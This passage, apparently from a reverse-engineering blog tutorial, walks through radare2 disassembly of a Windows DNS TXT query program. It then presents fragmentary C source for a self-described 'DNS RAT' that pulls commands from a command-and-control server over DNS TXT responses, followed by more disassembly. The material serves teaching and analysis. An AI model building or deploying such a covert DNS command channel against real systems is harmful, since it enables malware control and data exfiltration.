| 0x0040170b 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| 0x0040170f 83ca01 or edx, 1
| 0x00401712 885002 mov byte [rax + 2], dl
| 0x00401715 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040171c 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| 0x00401720 83e27f and edx, 0x7f
| 0x00401723 885003 mov byte [rax + 3], dl
| 0x00401726 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040172d 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| 0x00401731 83e2bf and edx, 0xffffffbf
| 0x00401734 885003 mov byte [rax + 3], dl
| 0x00401737 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040173e 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| 0x00401742 83e2df and edx, 0xffffffdf
| 0x00401745 885003 mov byte [rax + 3], dl
| 0x00401748 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040174f 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| 0x00401753 83e2ef and edx, 0xffffffef
| 0x00401756 885003 mov byte [rax + 3], dl
| 0x00401759 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x00401760 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| 0x00401764 83e2f0 and edx, 0xfffffff0
| 0x00401767 885003 mov byte [rax + 3], dl
| 0x0040176a b901000000 mov ecx, 1
| 0x0040176f 488b05aa7c00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409420:8]=0x97c2 reloc.WS2_32.dll_htons
| 0x00401776 ffd0 call rax
| 0x00401778 89c2 mov edx, eax
| 0x0040177a 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x00401781 66895004 mov word [rax + 4], dx
| 0x00401785 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040178c 66c740060000 mov word [rax + 6], 0
| 0x00401792 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x00401799 66c740080000 mov word [rax + 8], 0
| 0x0040179f 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004017a6 66c7400a0000 mov word [rax + 0xa], 0
| 0x004017ac 488d85f00100. lea rax, [arg_1f0h] ; 0x1f0 ; 496
| 0x004017b3 4883c00c add rax, 0xc
| 0x004017b7 488985100201. mov qword [arg_10210h], rax ; [0x10210:8]=0
| 0x004017be 488d85800100. lea rax, [arg_180h] ; 0x180 ; 384
| 0x004017c5 488b8d100201. mov rcx, qword [arg_10210h] ; [0x10210:8]=0
| 0x004017cc 4889c2 mov rdx, rax
| 0x004017cf e87cfdffff call sym.ChangetoDnsNameFormat
| 0x004017d4 488b85100201. mov rax, qword [arg_10210h] ; [0x10210:8]=0
| 0x004017db 4889c1 mov rcx, rax
| 0x004017de e81d180000 call sym.strlen ; size_t strlen(const char *s)
| 0x004017e3 488d500d lea rdx, [rax + 0xd] ; 13
| 0x004017e7 488d85f00100. lea rax, [arg_1f0h] ; 0x1f0 ; 496
| 0x004017ee 4801d0 add rax, rdx ; '('
| 0x004017f1 488985200201. mov qword [arg_10220h], rax ; [0x10220:8]=0
| 0x004017f8 b910000000 mov ecx, 0x10 ; 16
| 0x004017fd 488b051c7c00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409420:8]=0x97c2 reloc.WS2_32.dll_htons
| 0x00401804 ffd0 call rax
| 0x00401806 89c2 mov edx, eax
| 0x00401808 488b85200201. mov rax, qword [arg_10220h] ; [0x10220:8]=0
| 0x0040180f 668910 mov word [rax], dx
| 0x00401812 b901000000 mov ecx, 1
| 0x00401817 488b05027c00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409420:8]=0x97c2 reloc.WS2_32.dll_htons
| 0x0040181e ffd0 call rax
| 0x00401820 89c2 mov edx, eax
| 0x00401822 488b85200201. mov rax, qword [arg_10220h] ; [0x10220:8]=0
| 0x00401829 66895002 mov word [rax + 2], dx
| 0x0040182d c7850c020100. mov dword [arg_1020ch], 0x10 ; 16
| 0x00401837 c78508020100. mov dword [arg_10208h], 0x35 ; '5' ; 53
| 0x00401841 488d45e0 lea rax, [local_20h]
| 0x00401845 4889c2 mov rdx, rax
| 0x00401848 b902020000 mov ecx, 0x202 ; 514
| 0x0040184d 488b05c47b00. mov rax, qword sym.imp.WS2_32.dll_WSAStartup ; [0x409418:8]=0x97b4 reloc.WS2_32.dll_WSAStartup
| 0x00401854 ffd0 call rax
| 0x00401856 85c0 test eax, eax
| ,=< 0x00401858 7421 je 0x40187b
| | 0x0040185a 488b05af7b00. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409410:8]=0x97a2 reloc.WS2_32.dll_WSAGetLastError
| | 0x00401861 ffd0 call rax
| | 0x00401863 89c2 mov edx, eax
| | 0x00401865 488d0dcb3700. lea rcx, str.Failed._Error_Code_:__d ; 0x405037 ; "Failed. Error Code : %d"
| | 0x0040186c e8b7170000 call sym.printf ; int printf(const char *format)
| | 0x00401871 b801000000 mov eax, 1
| ,==< 0x00401876 e963020000 jmp 0x401ade
| || ; CODE XREF from 0x00401858 (sym.main)
| |`-> 0x0040187b 488d0dcd3700. lea rcx, str.1___WINSOCK_INITIALIZED. ; 0x40504f ; "1 - WINSOCK INITIALIZED. "
| | 0x00401882 e891170000 call sym.puts ; int puts(const char *s)
| | 0x00401887 41b811000000 mov r8d, 0x11 ; 17
| | 0x0040188d ba02000000 mov edx, 2
| | 0x00401892 b902000000 mov ecx, 2
| | 0x00401897 488b05a27b00. mov rax, qword sym.imp.WS2_32.dll_socket ; [0x409440:8]=0x97ec reloc.WS2_32.dll_socket
| | 0x0040189e ffd0 call rax
| | 0x004018a0 488985000201. mov qword [arg_10200h], rax ; [0x10200:8]=0
| | 0x004018a7 4883bd000201. cmp qword [arg_10200h], 0xffffffffffffffff
| |,=< 0x004018af 7517 jne 0x4018c8
| || 0x004018b1 488b05587b00. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409410:8]=0x97a2 reloc.WS2_32.dll_WSAGetLastError
| || 0x004018b8 ffd0 call rax
| || 0x004018ba 89c2 mov edx, eax
| || 0x004018bc 488d0da63700. lea rcx, str.Could_not_create_socket_:__d ; 0x405069 ; "Could not create socket : %d"
| || 0x004018c3 e860170000 call sym.printf ; int printf(const char *format)
| || ; CODE XREF from 0x004018af (sym.main)
| |`-> 0x004018c8 488d0db73700. lea rcx, str.2___WINSOCK_SOCKET_CREATED. ; 0x405086 ; "2 - WINSOCK SOCKET CREATED. "
| | 0x004018cf e844170000 call sym.puts ; int puts(const char *s)
| | 0x004018d4 66c745d00200 mov word [local_30h], 2
| | 0x004018da 8b8508020100 mov eax, dword [arg_10208h] ; [0x10208:4]=0
| | 0x004018e0 0fb7c0 movzx eax, ax
| | 0x004018e3 89c1 mov ecx, eax
| | 0x004018e5 488b05347b00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409420:8]=0x97c2 reloc.WS2_32.dll_htons
| | 0x004018ec ffd0 call rax
| | 0x004018ee 668945d2 mov word [local_2eh], ax
| | 0x004018f2 488d0daa3700. lea rcx, str. ; 0x4050a3 ; ""
| | 0x004018f9 488b05287b00. mov rax, qword sym.imp.WS2_32.dll_inet_addr ; [0x409428:8]=0x97ca reloc.WS2_32.dll_inet_addr
| | 0x00401900 ffd0 call rax
| | 0x00401902 8945d4 mov dword [local_2ch], eax
| | 0x00401905 488b85100201. mov rax, qword [arg_10210h] ; [0x10210:8]=0
| | 0x0040190c 4889c1 mov rcx, rax
| | 0x0040190f e8ec160000 call sym.strlen ; size_t strlen(const char *s)
| | 0x00401914 83c011 add eax, 0x11
| | 0x00401917 4189c0 mov r8d, eax
| | 0x0040191a 488d85f00100. lea rax, [arg_1f0h] ; 0x1f0 ; 496
| | 0x00401921 488b8d000201. mov rcx, qword [arg_10200h] ; [0x10200:8]=0
| | 0x00401928 8b950c020100 mov edx, dword [arg_1020ch] ; [0x1020c:4]=0
| | 0x0040192e 89542428 mov dword [arg_28h], edx
| | 0x00401932 488d55d0 lea rdx, [local_30h]
| | 0x00401936 4889542420 mov qword [arg_20h], rdx
| | 0x0040193b 41b900000000 mov r9d, 0
| | 0x00401941 4889c2 mov rdx, rax
| | 0x00401944 488b05ed7a00. mov rax, qword sym.imp.WS2_32.dll_sendto ; [0x409438:8]=0x97e2 reloc.WS2_32.dll_sendto
| | 0x0040194b ffd0 call rax
| | 0x0040194d 83f8ff cmp eax, 0xffffffffffffffff
| |,=< 0x00401950 7521 jne 0x401973
| || 0x00401952 488b05b77a00. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409410:8]=0x97a2 reloc.WS2_32.dll_WSAGetLastError
| || 0x00401959 ffd0 call rax
| || 0x0040195b 89c2 mov edx, eax
| || 0x0040195d 488d0d4c3700. lea rcx, str.sendto___failed_with_error_code_:__d ; 0x4050b0 ; "sendto() failed with error code : %d "
| || 0x00401964 e8bf160000 call sym.printf ; int printf(const char *format)
| || 0x00401969 b901000000 mov ecx, 1
| || 0x0040196e e8e5160000 call sym.exit
| || ; CODE XREF from 0x00401950 (sym.main)
| |`-> 0x00401973 488d0d5c3700. lea rcx, str.3___SENDTO___OK__packet_sent ; 0x4050d6 ; "3 - SENDTO() OK, packet sent"
| | 0x0040197a e899160000 call sym.puts ; int puts(const char *s)
| | 0x0040197f 488d85f00100. lea rax, [arg_1f0h] ; 0x1f0 ; 496
| | 0x00401986 488b8d000201. mov rcx, qword [arg_10200h] ; [0x10200:8]=0
| | 0x0040198d 48c744242800. mov qword [arg_28h], 0
| | 0x00401996 48c744242000. mov qword [arg_20h], 0
| | 0x0040199f 41b900000000 mov r9d, 0
| | 0x004019a5 41b800000100 mov r8d, 0x10000
| | 0x004019ab 4889c2 mov rdx, rax
| | 0x004019ae 488b057b7a00. mov rax, qword sym.imp.WS2_32.dll_recvfrom ; [0x409430:8]=0x97d6 reloc.WS2_32.dll_recvfrom
| | 0x004019b5 ffd0 call rax
| | 0x004019b7 83f8ff cmp eax, 0xffffffffffffffff
| |,=< 0x004019ba 751c jne 0x4019d8
| || 0x004019bc 488b054d7a00. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409410:8]=0x97a2 reloc.WS2_32.dll_WSAGetLastError
| || 0x004019c3 ffd0 call rax
| || 0x004019c5 89c2 mov edx, eax
| || 0x004019c7 488d0d253700. lea rcx, str.error_recving_:__d ; 0x4050f3 ; "error recving : %d"
| || 0x004019ce e855160000 call sym.printf ; int printf(const char *format)
| ,===< 0x004019d3 e9ec000000 jmp 0x401ac4
| ||| ; CODE XREF from 0x004019ba (sym.main)
| ||`-> 0x004019d8 488d0d293700. lea rcx, str.4___RECVFROM___OK__packet_received ; 0x405108 ; "4 - RECVFROM() OK, packet received "
| || 0x004019df e834160000 call sym.puts ; int puts(const char *s)
| || 0x004019e4 488b85100201. mov rax, qword [arg_10210h] ; [0x10210:8]=0
| || 0x004019eb 4889c1 mov rcx, rax
| || 0x004019ee e80d160000 call sym.strlen ; size_t strlen(const char *s)
| || 0x004019f3 488d5011 lea rdx, [rax + 0x11] ; 17
| || 0x004019f7 488d85f00100. lea rax, [arg_1f0h] ; 0x1f0 ; 496
| || 0x004019fe 4801d0 add rax, rdx ; '('
| || 0x00401a01 488985f80101. mov qword [arg_101f8h], rax ; [0x101f8:8]=0
| || 0x00401a08 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| || 0x00401a0f 0fb74006 movzx eax, word [rax + 6] ; [0x6:2]=0xffff ; 6
| || 0x00401a13 6685c0 test ax, ax
| ||,=< 0x00401a16 0f84a8000000 je 0x401ac4
| ||| 0x00401a1c 488d85800100. lea rax, [arg_180h] ; 0x180 ; 384
| ||| 0x00401a23 4889c1 mov rcx, rax
| ||| 0x00401a26 e8d5150000 call sym.strlen ; size_t strlen(const char *s)
| ||| 0x00401a2b 83c01d add eax, 0x1d
| ||| 0x00401a2e 8985f4010100 mov dword [arg_101f4h], eax ; [0x101f4:4]=0
| ||| 0x00401a34 8b85f4010100 mov eax, dword [arg_101f4h] ; [0x101f4:4]=0
| ||| 0x00401a3a 4898 cdqe
| ||| 0x00401a3c 0fb68405f001. movzx eax, byte [rbp + rax + 0x1f0] ; [0x1f0:1]=255 ; 496
| ||| 0x00401a44 0fb6c0 movzx eax, al
| ||| 0x00401a47 8985f0010100 mov dword [arg_101f0h], eax ; [0x101f0:4]=0
| ||| 0x00401a4d 8b85f0010100 mov eax, dword [arg_101f0h] ; [0x101f0:4]=0
| ||| 0x00401a53 89c2 mov edx, eax
| ||| 0x00401a55 488d0dd03600. lea rcx, str.BUF:__d ; 0x40512c ; "BUF: %d \n"
| ||| 0x00401a5c e8c7150000 call sym.printf ; int printf(const char *format)
| ||| 0x00401a61 488d85f00100. lea rax, [arg_1f0h] ; 0x1f0 ; 496
| ||| 0x00401a68 488985180201. mov qword [arg_10218h], rax ; [0x10218:8]=0
| ||| 0x00401a6f 8b85f4010100 mov eax, dword [arg_101f4h] ; [0x101f4:4]=0
| ||| 0x00401a75 83c001 add eax, 1
| ||| 0x00401a78 89852c020100 mov dword [arg_1022ch], eax ; [0x1022c:4]=0
| ,====< 0x00401a7e eb21 jmp 0x401aa1
| |||| ; CODE XREF from 0x00401ab8 (sym.main)
| .-----> 0x00401a80 8b852c020100 mov eax, dword [arg_1022ch] ; [0x1022c:4]=0
| :|||| 0x00401a86 4898 cdqe
| :|||| 0x00401a88 0fb68405f001. movzx eax, byte [rbp + rax + 0x1f0] ; [0x1f0:1]=255 ; 496
| :|||| 0x00401a90 0fb6c0 movzx eax, al
| :|||| 0x00401a93 89c1 mov ecx, eax
| :|||| 0x00401a95 e886150000 call sym.putchar ; int putchar(int c)
| :|||| 0x00401a9a 83852c020100. add dword [arg_1022ch], 1
| :|||| ; CODE XREF from 0x00401a7e (sym.main)
| :`----> 0x00401aa1 8b85f4010100 mov eax, dword [arg_101f4h] ; [0x101f4:4]=0
| : ||| 0x00401aa7 8d5001 lea edx, [rax + 1] ; 1
| : ||| 0x00401aaa 8b85f0010100 mov eax, dword [arg_101f0h] ; [0x101f0:4]=0
| : ||| 0x00401ab0 01d0 add eax, edx
| : ||| 0x00401ab2 39852c020100 cmp dword [arg_1022ch], eax ; [0x13:4]=-1 ; 19
| `=====< 0x00401ab8 7cc6 jl 0x401a80
| ||| 0x00401aba b90a000000 mov ecx, 0xa
| ||| 0x00401abf e85c150000 call sym.putchar ; int putchar(int c)
| ||| ; CODE XREF from 0x004019d3 (sym.main)
| ||| ; CODE XREF from 0x00401a16 (sym.main)
| `-`-> 0x00401ac4 488b053d7900. mov rax, qword sym.imp.WS2_32.dll_WSACleanup ; [0x409408:8]=0x9794 reloc.WS2_32.dll_WSACleanup
| | 0x00401acb ffd0 call rax
| | 0x00401acd 488d0d623600. lea rcx, str.WSACLEANUP___OK_exiting ; 0x405136 ; "WSACLEANUP() OK exiting "
| | 0x00401ad4 e83f150000 call sym.puts ; int puts(const char *s)
| | 0x00401ad9 b800000000 mov eax, 0
| | ; CODE XREF from 0x00401876 (sym.main)
| `--> 0x00401ade 4881c4b00201. add rsp, 0x102b0
| 0x00401ae5 5d pop rbp
\ 0x00401ae6 c3 ret
As you can see here, progams start to get huge and kind of unreadable when you have bigger progams like this one, that start to look like “real world projects” instead of just simple examples you definetely cannot go line by line trying to figure everything out as it will take ages to do and may also be very complex as when progams start to fork their workflow things get mega complex.
One interesting approach in scenarios like that is to inspect function calls, an initial overview on function calls will get you a general idea on the progam, breakpoints before and after func. calls will let you know what is actually going on on the program.
In case of doubt we can go and analyze the context of those calls and that’s it.
So let’s begin here:
We start by seeing how the program initializes a lot of data, on some particular memory block:
| 0x004016b2 ffd0 call rax
| 0x004016b4 89c2 mov edx, eax
| 0x004016b6 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004016bd 668910 mov word [rax], dx
| 0x004016c0 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004016c7 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| 0x004016cb 83e27f and edx, 0x7f
| 0x004016ce 885002 mov byte [rax + 2], dl
| 0x004016d1 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004016d8 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| 0x004016dc 83e287 and edx, 0xffffff87
| 0x004016df 885002 mov byte [rax + 2], dl
| 0x004016e2 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004016e9 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| 0x004016ed 83e2fb and edx, 0xfffffffb
| 0x004016f0 885002 mov byte [rax + 2], dl
| 0x004016f3 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x004016fa 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| 0x004016fe 83e2fd and edx, 0xfffffffd
| 0x00401701 885002 mov byte [rax + 2], dl
| 0x00401704 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040170b 0fb65002 movzx edx, byte [rax + 2] ; [0x2:1]=255 ; 2
| 0x0040170f 83ca01 or edx, 1
| 0x00401712 885002 mov byte [rax + 2], dl
| 0x00401715 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040171c 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| 0x00401720 83e27f and edx, 0x7f
| 0x00401723 885003 mov byte [rax + 3], dl
| 0x00401726 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040172d 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| 0x00401731 83e2bf and edx, 0xffffffbf
| 0x00401734 885003 mov byte [rax + 3], dl
| 0x00401737 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040173e 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| 0x00401742 83e2df and edx, 0xffffffdf
| 0x00401745 885003 mov byte [rax + 3], dl
| 0x00401748 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040174f 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| 0x00401753 83e2ef and edx, 0xffffffef
| 0x00401756 885003 mov byte [rax + 3], dl
| 0x00401759 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x00401760 0fb65003 movzx edx, byte [rax + 3] ; [0x3:1]=255 ; 3
| 0x00401764 83e2f0 and edx, 0xfffffff0
We don’t need to go line by line here to see that an array or a struct is being initialized here, as we see rax+2 and rax+3 alltogether we can guess it is more like a struct than an array
Then we see htons being called and more values added:
| 0x0040176f 488b05aa7c00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409420:8]=0x97c2 reloc.WS2_32.dll_htons
| 0x00401776 ffd0 call rax
| 0x00401778 89c2 mov edx, eax
| 0x0040177a 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x00401781 66895004 mov word [rax + 4], dx
| 0x00401785 488b85180201. mov rax, qword [arg_10218h] ; [0x10218:8]=0
| 0x0040178c 66c740060000 mov word [rax + 6], 0
On this point we can actually guess that this struct somehow relates to some network data, and as this struct is large (compared to sockaddr for example) we can deduce that this may be a network packet
Then we see this being called:
| 0x004017c5 488b8d100201. mov rcx, qword [arg_10210h] ; [0x10210:8]=0
| 0x004017cc 4889c2 mov rdx, rax
| 0x004017cf e87cfdffff call sym.ChangetoDnsNameFormat
| 0x004017d4 488b85100201. mov rax, qword [arg_10210h] ; [0x10210:8]=0
| 0x004017db 4889c1 mov rcx, rax
| 0x004017de e81d180000 call sym.strlen ; size_t strlen(const char *s)
| 0x004017e3 488d500d lea rdx, [rax + 0xd] ; 13
| 0x004017e7 488d85f00100. lea rax, [arg_1f0h] ; 0x1f0 ; 496
| 0x004017ee 4801d0 add rax, rdx ; '('
| 0x004017f1 488985200201. mov qword [arg_10220h], rax ; [0x10220:8]=0
ChangetoDnsNameFormat, thing is pretty clear at this point that must be a DNS query.
The call to htons and right after the definition of 53 (the dns port) confirm our guess
| 0x00401817 488b05027c00. mov rax, qword sym.imp.WS2_32.dll_htons ; [0x409420:8]=0x97c2 reloc.WS2_32.dll_htons
| 0x0040181e ffd0 call rax
| 0x00401820 89c2 mov edx, eax
| 0x00401822 488b85200201. mov rax, qword [arg_10220h] ; [0x10220:8]=0
| 0x00401829 66895002 mov word [rax + 2], dx
| 0x0040182d c7850c020100. mov dword [arg_1020ch], 0x10 ; 16
| 0x00401837 c78508020100. mov dword [arg_10208h], 0x35 ; '5' ; 53
Then, nothing new, WSAStartup is called socket is created and then sendto:
| | 0x00401936 4889542420 mov qword [arg_20h], rdx
| | 0x0040193b 41b900000000 mov r9d, 0
| | 0x00401941 4889c2 mov rdx, rax
| | 0x00401944 488b05ed7a00. mov rax, qword sym.imp.WS2_32.dll_sendto ; [0x409438:8]=0x97e2 reloc.WS2_32.dll_sendto
| | 0x0040194b ffd0 call rax
| | 0x0040194d 83f8ff cmp eax, 0xffffffffffffffff
| |,=< 0x00401950 7521 jne 0x401973
That is a good place to set a breakpoint at, so we can see what is being sent
And here it is:
[0x00401944]> px @ 0x0060fde0
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0x0060fde0 1fb4 0100 0001 0000 0000 0000 036a 6f65 .............joe
0x0060fdf0 0261 6205 6c6f 6361 6c00 0010 0001 0000 .ab.local.......
We should see the same exact thing in wireshark:
So this looks like a TXT request for joe.ab.local, pretty legitimate, nothing weird here, let us now look at the response:
| | 0x004019ab 4889c2 mov rdx, rax
| | 0x004019ae 488b057b7a00. mov rax, qword sym.imp.WS2_32.dll_recvfrom ; [0x409430:8]=0x7ffcc1793010
| | 0x004019b5 ffd0 call rax
| ;-- rip:
| | 0x004019b7 b 83f8ff cmp eax, 0xffffffffffffffff
So, calling recv, the answer should be in the previously declared buffer:
[0x004019b7]> pxw @ 0x0060fde0
0x0060fde0 0x8085b41f 0x01000100 0x01000100 0x656f6a03 .............joe
0x0060fdf0 0x05626102 0x61636f6c 0x1000006c 0x0cc00100 .ab.local.......
0x0060fe00 0x01001000 0x803a0900 0x59141500 0x6320756f ......:....You c
0x0060fe10 0x70206e61 0x61207475 0x7420796e 0xc0747865 an put any text.
0x0060fe20 0x00020010 0x3a090001 0x070a0080 0x6d697270 .......:....prim
0x0060fe30 0xc0797261 0x004bc010 0x00010001 0x00803a09 ary...K......:..
0x0060fe40 0x00a8c004 0x00000032 0x00000000 0x00000000 ....2...........
And that is the response.
As we go further in the progam we should not see anything of interest. So we can consider that our work with the program is done at this point. And our veredict is that, this program asks a user for input and performs a TXT DNS query based on the user input to a remote server on port 53
Malware Command & Control systems through DNS
So as we now know about the DNS packet format, we see that any kind of information can be encoded inside a domain name query / txt response, so this can clearly be used, and it actually is, as a malware cover communication channel for command and contrl or for (slow) file exfiltration.
Let’s look at the following program:
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <conio.h>
#pragma comment(lib, "ws2_32")
#define BUFLEN 65536
struct dns_header
unsigned short id; // identification number
unsigned char rd :1; // recursion desired
unsigned char tc :1; // truncated message
unsigned char aa :1; // authoritive answer
unsigned char opcode :4; // purpose of message
unsigned char qr :1; // query/response flag
unsigned char rcode :4; // response code
unsigned char cd :1; // checking disabled
unsigned char ad :1; // authenticated data
unsigned char z :1; // its z! reserved
unsigned char ra :1; // recursion available
unsigned short q_count; // number of question entries
unsigned short ans_count; // number of answer entries
unsigned short auth_count; // number of authority entries
unsigned short add_count; // number of resource entries
struct question{
unsigned short type;
unsigned short tclass;
typedef struct
unsigned char *name;
struct question *ques;
} query;
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host){
int lock = 0 , i;
for(i = 0 ; i < strlen((char*)host) ; i++)
*dns++ = i-lock;
lock++; //or lock=i+1;
void processCommand(char buf[]){
char c = buf[0];
if(c == '1'){
char msg[strlen(buf)-2];
strncpy(msg, buf+2,strlen(buf)-2);
int msgboxID = MessageBox(
else if(c == '2'){
int i = 0;
char beep[strlen(buf)-2];
strncpy(beep, buf+2,strlen(buf)-2);
sscanf(beep, "%d", &i);
else if(c == '3'){
int main()
if (WSAStartup(MAKEWORD(2,2),&wsa) != 0){
printf("Failed. Error Code : %d",WSAGetLastError());
return 1;
int i = 0;
SOCKET sock;
SOCKADDR_IN ReceiverAddr , SrcInfo;
int slen = sizeof(ReceiverAddr) ;
int port = 53;
printf("1 - WINSOCK INITIALIZED. \n");
printf("Could not create socket : %d" , WSAGetLastError());
printf("2 - WINSOCK SOCKET CREATED. \n");
ReceiverAddr.sin_family = AF_INET;
ReceiverAddr.sin_port = htons(port);
ReceiverAddr.sin_addr.s_addr = inet_addr("");
printf("Going for round: %d \n",i);
unsigned char buf[65536],*qname,*reader;
char host[100]; // DNS QUERY
printf("DNS RAT UP AND RUNNING \n");
strcpy(host, "mark.ab.local");
struct question *qinfo = NULL;
struct dns_header *dns = NULL;
dns = (struct dns_header *)&buf;
dns->id = (unsigned short) htons(getpid());
dns->qr = 0; //This is a query
dns->opcode = 0; //This is a standard query
dns->aa = 0; //Not Authoritative
dns->tc = 0; //This message is not truncated
dns->rd = 1; //Recursion Desired
dns->ra = 0; //Recursion not available! hey we dont have it (lol)
dns->z = 0;
dns->ad = 0;
dns->cd = 0;
dns->rcode = 0;
dns->q_count = htons(1); //we have only 1 question
dns->ans_count = 0;
dns->auth_count = 0;
dns->add_count = 0;
qname =(unsigned char*)&buf[sizeof(struct dns_header)];
ChangetoDnsNameFormat(qname , host); // SUBSTITUTE '.' BY LENGTH
qinfo =(struct question*)&buf[sizeof(struct dns_header) + (strlen((const char*)qname) + 1)];
qinfo->type = htons(16); // 1 == 'A', 16 == 'TXT', we ask for TXT registers
qinfo->tclass = htons(1); // 1 = INTERNET
if (sendto(sock,(char*)buf,sizeof(struct dns_header) + (strlen((const char*)qname)+1) + sizeof(struct question) , 0 , (struct SOCKADDR *) &ReceiverAddr, slen) == SOCKET_ERROR){
printf("sendto() failed with error code : %d ", WSAGetLastError());
printf("3 - SENDTO() OK, packet sent\n");
if (recvfrom(sock, &buf, BUFLEN, 0,0,0) == SOCKET_ERROR){
printf("error recving : %d" , WSAGetLastError());
printf("4 - RECVFROM() OK, packet received \n"); // joe.ab.local
reader = &buf[sizeof(struct dns_header) + (strlen((const char*)qname)+1) + sizeof(struct question)];
if(dns->ans_count > 0){
int txt_position = 30 + strlen(host)-1;
int txt_response_len = buf[txt_position];
char command[txt_response_len];
strncpy(command,buf + txt_position+1, txt_response_len);
i +=1;
printf("WSACLEANUP() OK exiting \n");
return 0;
So, it is similar to the previous one, this time the program uses the DNS TXT query/response flow to ask for and retrieve commands from an eventual command and control server.
The progam basically sends one DNS query after another retrieving commands that will tell about the next actions to do. The program will act according to those commands, let’s disasm:
Here’s the disasm
[0x004017f7]> pdf
/ (fcn) sym.main 1249
| sym.main (int arg_20h, int arg_10040h, int arg_10042h, int arg_10044h, int arg_10050h, int arg_101f0h, int arg_101f8h, int arg_10200h, int arg_10204h, int arg_10208h, int arg_10210h, int arg_10218h, int arg_10220h, int arg_10228h, int arg_10234h, int arg_10238h, int arg_1023ch, int arg_10248h, int arg_30h, int arg_80h);
| ; var int local_50h @ rbp-0x50
| ; var int local_20h @ rsp+0x20
| ; var int local_28h @ rsp+0x28
| ; arg int arg_30h @ rsp+0x30
| ; arg int arg_80h @ rsp+0x80
| ; CALL XREF from 0x004013c2 (sym.__tmainCRTStartup)
| 0x004017f7 55 push rbp
| 0x004017f8 4155 push r13
| 0x004017fa 4154 push r12
| 0x004017fc 57 push rdi
| 0x004017fd 56 push rsi
| 0x004017fe 53 push rbx
| 0x004017ff b8c8020100 mov eax, 0x102c8
| 0x00401804 e897190000 call fcn.004031a0
| 0x00401809 4829c4 sub rsp, rax
| 0x0040180c 488dac248000. lea rbp, [arg_80h] ; 0x80 ; 128
| 0x00401814 e8b7050000 call sym.__main
| 0x00401819 488d85500001. lea rax, [arg_10050h] ; 0x10050
| 0x00401820 4889c2 mov rdx, rax
| 0x00401823 b902020000 mov ecx, 0x202 ; 514
| 0x00401828 488b051d7c00. mov rax, qword sym.imp.WS2_32.dll_WSAStartup ; [0x40944c:8]=0x97f2 reloc.WS2_32.dll_WSAStartup
| 0x0040182f ffd0 call rax
| 0x00401831 85c0 test eax, eax
| ,=< 0x00401833 7421 je 0x401856
| | 0x00401835 488b05087c00. mov rax, qword sym.imp.WS2_32.dll_WSAGetLastError ; [0x409444:8]=0x97e0 reloc.WS2_32.dll_WSAGetLastError
| | 0x0040183c ffd0 call rax
| | 0x0040183e 89c2 mov edx, eax
| | 0x00401840 488d0dc23700. lea rcx, str.Failed._Error_Code_:__d ; 0x405009 ; "Failed. Error Code : %d"
| | 0x00401847 e8ec190000 call sym.printf ; int printf(const char *format)
| | 0x0040184c b801000000 mov eax, 1
| ,==< 0x00401851 e972040000 jmp 0x401cc8
| || ; CODE XREF from 0x00401833 (sym.main)
| |`-> 0x00401856 c7853c020100. mov dword [arg_1023ch], 0 ; [0x1023c:4]=0
| | 0x00401860 c78538020100. mov dword [arg_10238h], 0x10 ; 16
| | 0x0040186a c78534020100. mov dword [arg_10234h], 0x35 ; '5' ; 53
